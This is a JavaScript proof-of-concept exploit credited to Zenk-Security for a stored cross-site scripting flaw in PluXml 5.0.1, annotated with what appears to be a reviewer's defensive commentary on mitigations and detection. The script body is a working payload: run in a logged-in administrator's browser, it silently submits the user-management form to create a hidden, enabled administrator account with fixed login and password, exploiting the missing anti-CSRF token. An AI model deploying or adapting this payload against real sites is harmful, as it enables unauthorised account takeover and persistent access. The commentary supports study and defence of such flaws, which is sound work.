/******************************************
 *
 * Author: Zenk-Security
 * App: Pluxml 5.0.1
 * Type: Persistent XSS exploitation
 * Function: Create Administrator account
 *
 * Reviewer summary (defensive reading):
 *   This is the script body of a stored-XSS proof of concept. The injection
 *   point is not shown here. When the script runs in a logged-in
 *   administrator's browser, it submits the user-management form in the
 *   background, so the request rides the administrator's existing session.
 *
 *   What makes the request succeed, as far as this file shows:
 *     - the POST body carries no anti-CSRF token or current-password field;
 *       presumably the endpoint in this version accepted it without one
 *       (confirm against the application source);
 *     - the script executes in the application's own origin, so a cookie
 *       flag such as HttpOnly does not stop it: the cookie is never read,
 *       only sent by the browser.
 *
 *   Mitigations to check for:
 *     - output-encode every stored field that is rendered in admin pages;
 *     - require a per-session token and re-authentication for account
 *       creation and privilege changes;
 *     - a Content-Security-Policy that disallows inline and untrusted
 *       script.
 *
 *   Detection ideas:
 *     - alert on new or changed accounts that no administrator initiated;
 *     - review POSTs to the user-management endpoint whose Referer is not
 *       the user-management page itself.
 *
 *****************************************/

/**
 * Returns an XMLHttpRequest-style object, or null when none can be created.
 *
 * Tries the two legacy Internet Explorer ActiveX ProgIDs first, then the
 * native XMLHttpRequest constructor. Each attempt sits in its own try block
 * with an empty catch, so a failure simply falls through to the next one.
 */
function createXMLHttpRequest() {
    try { return new ActiveXObject("Msxml2.XMLHTTP"); } catch(e) {}
    try { return new ActiveXObject("Microsoft.XMLHTTP"); } catch(e) {}
    try { return new XMLHttpRequest(); } catch(e) {}
    return null;
}

var ajax = createXMLHttpRequest();
if(ajax != null) {
    // Form body for the user-management page. The fields describe one new
    // user row (index 999) with a fixed name, login and password.
    // NOTE(review): 999_profil=0 is presumably the administrator profile and
    // 999_active=1 presumably marks the account enabled, going by the header's
    // stated purpose. Confirm against the application's profile constants.
    // The "update" value is the label of the form's submit button
    // ("Modify the user list").
    // No token or nonce parameter is present in this body.
    var params = 'userNum[]=999&999_newuser=true&999_name=user&999_infos=&999_login=login&999_password=pass&999_profil=0&999_active=1&selection=&update=Modifier+la+liste+des+utilisateurs';

    // The path is relative, so the request goes to the origin that served the
    // page and the browser attaches that origin's session cookies. The third
    // argument (true) makes the call asynchronous, so nothing is visible to
    // the user.
    ajax.open('POST', '/pluxml/core/admin/parametres_users.php', true);
    ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

    // Content-length and Connection are browser-managed (forbidden) header
    // names. Current browsers ignore attempts to set them from script.
    ajax.setRequestHeader("Content-length", params.length);
    ajax.setRequestHeader("Connection", "close");

    // The response is never read and no handler is attached. The effect is
    // entirely server-side.
    ajax.send(params);
}